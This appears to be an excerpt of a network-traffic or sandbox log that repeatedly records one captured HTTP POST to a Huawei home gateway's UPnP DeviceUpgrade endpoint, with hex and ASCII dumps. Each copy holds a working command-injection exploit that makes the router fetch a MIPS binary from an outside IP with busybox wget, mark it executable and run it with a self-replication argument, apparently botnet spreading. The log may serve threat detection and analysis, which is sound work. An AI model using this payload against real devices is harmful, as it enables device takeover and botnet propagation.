52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
